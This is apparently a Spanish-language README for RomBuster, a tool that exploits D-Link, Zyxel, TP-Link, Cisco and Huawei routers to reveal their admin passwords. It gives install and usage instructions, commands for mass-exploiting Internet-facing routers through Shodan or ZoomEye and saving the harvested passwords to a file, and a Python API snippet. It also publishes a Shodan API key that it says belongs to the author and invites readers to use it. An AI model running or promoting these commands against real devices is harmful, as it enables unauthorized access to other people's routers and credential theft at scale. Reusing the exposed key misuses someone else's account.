
RomBuster es una herramienta de explotación de routers que permite revelar la contraseña de administrador del router de red.
RomBuster es una herramienta de explotación de routers que permite revelar la contraseña de administrador del router de red.
D-Link, Zyxel, TP-Link, Cisco y Huawei.pip3 install git+https://github.com/EntySec/RomBuster
Para usar RomBuster, simplemente escribe rombuster en tu terminal.
usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
RomBuster is a router exploitation tool that allows to disclosure network
router admin password.
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
Explotando un solo router
Vamos a hackear mi router solo por diversión.
rombuster -a 192.168.99.1
Explotando routers desde Internet
Probemos a usar el motor de búsqueda Shodan para explotar routers a través de Internet.
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
NOTA: La clave API de Shodan proporcionada (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) es mi clave PRO, puedes usar esta clave o la tuya propia, siéntete libre de usar todos nuestros recursos de forma gratuita :)
Explotando routers desde un archivo de entrada
Probemos a usar una base de datos abierta de routers.
rombuster -i routers.txt -o passwords.txt
NOTA: Explotará todos los routers de la lista routers.txt por sus direcciones y guardará todas las contraseñas obtenidas en passwords.txt.
RomBuster también tiene su propia API de Python que se puede invocar importando RomBuster a tu código.
from rombuster import RomBuster
Estas son todas las funciones básicas de RomBuster que se pueden usar para explotar un router específico.
exploit(address) - Explota un solo router mediante la dirección dada.Explotando un solo router
from rombuster import RomBuster
rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.1')
print(creds)